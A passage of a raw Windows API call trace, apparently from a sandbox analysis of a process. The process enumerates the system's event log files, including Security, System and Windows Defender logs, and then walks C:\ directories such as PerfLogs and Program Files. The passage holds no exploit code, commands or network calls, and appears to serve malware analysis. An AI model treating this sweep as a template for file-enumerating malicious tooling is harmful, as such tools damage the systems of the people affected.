lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0285.951] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0285.952] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0285.953] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0285.954] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0285.955] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0285.955] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 0 [0285.955] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0285.956] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0285.956] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xd2b66788, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0285.956] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0285.956] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0285.956] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Windows PowerShell.evtx", cAlternateFileName="鉠M\x08")) returned 0xffffffff [0285.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0285.957] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0285.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0285.957] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0285.958] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5d2666f8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5d2666f8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0285.958] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0285.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.959] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0285.959] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.959] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0285.959] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4025f98 [0285.959] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x39483a8 [0285.961] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0285.961] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0285.961] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, 